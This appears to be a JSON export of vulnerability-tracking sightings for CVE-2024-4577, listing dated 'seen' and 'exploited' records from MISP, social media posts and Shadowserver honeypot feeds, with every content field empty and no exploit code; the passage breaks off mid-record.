{"vulnerability": "cve-2024-4577", "sightings": [{"uuid": "1ae956d7-9254-43c0-b947-9a2c8f35a6de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-06-12T18:10:02.000000Z"}, {"uuid": "add22f1a-0f4f-409b-bb83-fee0c0b2bbd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://schleuss.online/users/vulnbot/statuses/113482191296938393", "content": "", "creation_timestamp": "2024-11-14T16:13:43.480933Z"}, {"uuid": "001f2781-a374-4be1-a08e-b8ef86fbc6da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://schleuss.online/users/vulnbot/statuses/113482191319258355", "content": "", "creation_timestamp": "2024-11-14T16:13:42.796465Z"}, {"uuid": "2b51cc67-9ba2-43ab-b10c-e775019f0bdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-4577", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/113488752490991972", "content": "", "creation_timestamp": "2024-11-15T20:02:15.697373Z"}, {"uuid": "a38454a2-7d48-48bd-8b8a-dfc310b5d2d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/heinen.bsky.social/post/3lfcu2qv6ts2p", "content": "", "creation_timestamp": "2025-01-09T14:07:58.279986Z"}, {"uuid": "035cf575-eb42-44d9-a343-4c5de0399c30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3lfbknowlr22p", "content": "", "creation_timestamp": "2025-01-09T01:46:58.378034Z"}, {"uuid": "72c63369-2fcb-4858-bbb9-b6ed1eb292ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3lf7dz3clku2c", "content": "", "creation_timestamp": "2025-01-08T04:42:45.571866Z"}, {"uuid": "dd4cf9e2-2a93-4ea7-8f05-8b9c5033466b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "c74d360b-b0bf-4045-bbcf-9dbf426d48f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-03)", "content": "", "creation_timestamp": "2025-02-03T00:00:00.000000Z"}, {"uuid": "70851dfc-a305-4f53-8ca8-ceffa6f4047f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-04)", "content": "", "creation_timestamp": "2025-02-04T00:00:00.000000Z"}, {"uuid": "6a9f25cb-e1ce-4ff4-8c64-d515f6e5ac8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-30)", "content": "", "creation_timestamp": "2025-01-30T00:00:00.000000Z"}, {"uuid": "ff42f2de-d81a-4eb8-a880-1d15a77f7178", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-29)", "content": "", "creation_timestamp": "2025-03-29T00:00:00.000000Z"}, {"uuid": "382d1b63-c3c2-492b-be99-9a3d0df18cd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-23)", "content": "", "creation_timestamp": "2025-01-23T00:00:00.000000Z"}, {"uuid": "d596c0fd-d834-4f6a-ac40-ceab3cac3704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-15)", "content": "", "creation_timestamp": "2025-01-15T00:00:00.000000Z"}, {"uuid": "e9edb3c4-927e-4640-a843-aca2cb53b3b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-18)", "content": "", "creation_timestamp": "2025-01-18T00:00:00.000000Z"}, {"uuid": "87d9e8e9-72c6-4956-bdee-aacc41ec2d46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-16)", "content": "", "creation_timestamp": "2025-01-16T00:00:00.000000Z"}, {"uuid": "fd4a4512-9447-414a-9c53-ccd5e62a1ddb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-20)", "content": "", "creation_timestamp": "2025-01-20T00:00:00.000000Z"}, {"uuid": "3041b079-a1d9-4a29-9b88-c736845c3acf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-21)", "content": "", "creation_timestamp": "2025-01-21T00:00:00.000000Z"}, {"uuid": "67a0bc1e-6c39-4bcb-8719-355edd9da5d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-17)", "content": "", "creation_timestamp": "2025-01-17T00:00:00.000000Z"}, {"uuid": "a23f9f4c-ceab-41ae-a6f7-10c0ba13f756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-24)", "content": "", "creation_timestamp": "2025-01-24T00:00:00.000000Z"}, {"uuid": "ff9c4527-2eca-4197-bf29-79b0eb8fbc14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-25)", "content": "", "creation_timestamp": "2024-12-25T00:00:00.000000Z"}, {"uuid": "59009917-a3c0-4199-84a4-7fc1ee2ea585", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-30)", "content": "", "creation_timestamp": "2024-12-30T00:00:00.000000Z"}, {"uuid": "4279acfe-d2a0-4814-b336-facc9f8e51ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-27)", "content": "", "creation_timestamp": "2024-12-27T00:00:00.000000Z"}, {"uuid": "cfba471f-2493-4db4-86a6-bcbfaa86f79c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-28)", "content": "", "creation_timestamp": "2024-12-28T00:00:00.000000Z"}, {"uuid": "44b8fab8-556f-4327-aeb6-70fa1fb3f15a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-29)", "content": "", "creation_timestamp": "2024-12-29T00:00:00.000000Z"}, {"uuid": "29b8506a-e53f-4a15-b29b-95f6009f60b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-03)", "content": "", "creation_timestamp": "2025-01-03T00:00:00.000000Z"}, {"uuid": "b9097fa8-b287-4067-9231-49a9ee4e2c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-22)", "content": "", "creation_timestamp": "2025-01-22T00:00:00.000000Z"}, {"uuid": "c9805548-ba96-4900-8a55-a0c9c7796d9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-09)", "content": "", "creation_timestamp": "2025-01-09T00:00:00.000000Z"}, {"uuid": "9758b394-d6ca-4e17-b1fd-07c21f655671", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-02)", "content": "", "creation_timestamp": "2025-02-02T00:00:00.000000Z"}, {"uuid": "35fbe096-f6c5-4ef0-94d8-7a174ef06318", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-01)", "content": "", "creation_timestamp": "2025-01-01T00:00:00.000000Z"}, {"uuid": "556df3f2-eae9-4f3b-94ee-94ffeecdad88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-07)", "content": "", "creation_timestamp": "2025-01-07T00:00:00.000000Z"}, {"uuid": "360b2e83-665a-4967-84e9-5ee74a18995d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-02)", "content": "", "creation_timestamp": "2025-01-02T00:00:00.000000Z"}, {"uuid": "aa204d44-a23f-4361-a822-7d0ba966ec4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-06)", "content": "", "creation_timestamp": "2025-01-06T00:00:00.000000Z"}, {"uuid": "d82e3d26-1fab-454b-a013-fcbfdd3a8a3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-08)", "content": "", "creation_timestamp": "2025-01-08T00:00:00.000000Z"}, {"uuid": "f45ad140-0570-4768-a786-be4d80cdedc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-10)", "content": "", "creation_timestamp": "2025-01-10T00:00:00.000000Z"}, {"uuid": "87c6c14f-834c-455f-b9dc-2756acb3b48a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-04)", "content": "", "creation_timestamp": "2025-01-04T00:00:00.000000Z"}, {"uuid": "07f3c9a4-07b5-4592-8742-98823a002323", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-05)", "content": "", "creation_timestamp": "2025-01-05T00:00:00.000000Z"}, {"uuid": "3d9a3808-5254-4fd4-91d3-5ab0bb610ffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-11)", "content": "", "creation_timestamp": "2025-01-11T00:00:00.000000Z"}, {"uuid": "f4a39336-211c-4092-8a0a-478219f0868c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-14)", "content": "", "creation_timestamp": "2025-01-14T00:00:00.000000Z"}, {"uuid": "34b20dd4-c5a6-4d22-9a58-269cfae00c1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-31)", "content": "", "creation_timestamp": "2025-01-31T00:00:00.000000Z"}, {"uuid": "e3d253be-ecad-40a3-8ca9-5a6c3ee5b0e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-12)", "content": "", "creation_timestamp": "2025-01-12T00:00:00.000000Z"}, {"uuid": "a3f09cab-1dc5-4e40-9d74-3087377830d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-13)", "content": "", "creation_timestamp": "2025-01-13T00:00:00.000000Z"}, {"uuid": "aa114c7d-c07e-4636-8a4f-c739bd4b4179", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-27)", "content": "", "creation_timestamp": "2024-10-27T00:00:00.000000Z"}, {"uuid": "c1b211f4-e525-4904-a269-49816fa25bb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-09)", "content": "", "creation_timestamp": "2024-11-09T00:00:00.000000Z"}, {"uuid": "a3dee65e-fb70-4729-8c8a-869166d56ffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-08)", "content": "", "creation_timestamp": "2024-11-08T00:00:00.000000Z"}, {"uuid": "c7b31c42-6353-4741-a216-e2a7e7042913", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-14)", "content": "", "creation_timestamp": "2024-11-14T00:00:00.000000Z"}, {"uuid": "9db7e94a-ebd6-499e-ada3-7f61c25cab62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-15)", "content": "", "creation_timestamp": "2024-11-15T00:00:00.000000Z"}, {"uuid": "00dccd7f-531d-4516-9fb7-5ad5eae3e8a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-17)", "content": "", "creation_timestamp": "2024-11-17T00:00:00.000000Z"}, {"uuid": "3229a497-7735-4a34-8a74-15ac3994d9fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-16)", "content": "", "creation_timestamp": "2024-11-16T00:00:00.000000Z"}, {"uuid": "1f49202c-819b-4654-a9a2-8cf2b738d824", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "da9c4dba-8320-4fa1-96b1-4da273f0135e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-18)", "content": "", "creation_timestamp": "2024-11-18T00:00:00.000000Z"}, {"uuid": "9d82a7b4-84a8-4974-80d4-d763edf4d2d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-21)", "content": "", "creation_timestamp": "2024-11-21T00:00:00.000000Z"}, {"uuid": "f8fd03f0-00d4-4bc5-b21d-ef129546ed04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-05)", "content": "", "creation_timestamp": "2025-02-05T00:00:00.000000Z"}, {"uuid": "2a5f98d8-48de-4bd3-b007-eba668959c89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-24)", "content": "", "creation_timestamp": "2024-11-24T00:00:00.000000Z"}, {"uuid": "416c3867-4ff4-4a97-8193-2a654605cbab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-27)", "content": "", "creation_timestamp": "2024-11-27T00:00:00.000000Z"}, {"uuid": "b4daead5-20a3-4f25-835c-8efc3b9aaa87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-26)", "content": "", "creation_timestamp": "2024-11-26T00:00:00.000000Z"}, {"uuid": "59ef332b-1007-45ef-a9b2-5e2e7ef1bb23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-28)", "content": "", "creation_timestamp": "2024-11-28T00:00:00.000000Z"}, {"uuid": "1a7a5d3f-db10-4ad5-97e8-88eef392da34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-09)", "content": "", "creation_timestamp": "2024-12-09T00:00:00.000000Z"}, {"uuid": "d0acfd15-0d65-42a3-a08a-3fdf021a9857", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-25)", "content": "", "creation_timestamp": "2025-01-25T00:00:00.000000Z"}, {"uuid": "790242ff-a7e0-409f-bf09-ac937dbd9d75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-13)", "content": "", "creation_timestamp": "2024-12-13T00:00:00.000000Z"}, {"uuid": "26a60f3b-6b31-4eb7-bde0-23f9d11b3ee6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-08)", "content": "", "creation_timestamp": "2024-12-08T00:00:00.000000Z"}, {"uuid": "e02950f6-4e4b-4fe4-9aca-faf08677cddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "7d8e613c-8907-4e2f-88bb-6f933fb1d13a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-14)", "content": "", "creation_timestamp": "2024-12-14T00:00:00.000000Z"}, {"uuid": "f35647c7-4b1f-4a8e-a1a1-af1740accc89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-05)", "content": "", "creation_timestamp": "2024-12-05T00:00:00.000000Z"}, {"uuid": "1210f196-470c-44fa-bffa-9ae5f0218b91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-15)", "content": "", "creation_timestamp": "2024-12-15T00:00:00.000000Z"}, {"uuid": "de24f5fb-b965-4ab1-b51c-4d1b6935c9f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-11)", "content": "", "creation_timestamp": "2024-12-11T00:00:00.000000Z"}, {"uuid": "e57b161d-ca2f-442e-9fd3-7d8a3c34f55f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-06)", "content": "", "creation_timestamp": "2025-02-06T00:00:00.000000Z"}, {"uuid": "40a4aa43-57a3-4e93-98e1-567e3ffa67ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-16)", "content": "", "creation_timestamp": "2024-12-16T00:00:00.000000Z"}, {"uuid": "2dcc71d8-64a4-47e0-a47f-d9cadc02d7f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-19)", "content": "", "creation_timestamp": "2024-12-19T00:00:00.000000Z"}, {"uuid": "a10f617b-3c98-4881-9df4-aa2a9faba382", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-17)", "content": "", "creation_timestamp": "2024-12-17T00:00:00.000000Z"}, {"uuid": "6f4d4ac2-6210-41eb-834a-92969ebcb44a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-30)", "content": "", "creation_timestamp": "2025-03-30T00:00:00.000000Z"}, {"uuid": "f4106b33-2c8b-4078-a336-825e0cd4f0ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "d4b7b3d6-ce5e-4b9f-a803-9925fb0fecd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "b8be429d-de04-47bb-bfc4-4a327576e9c3", 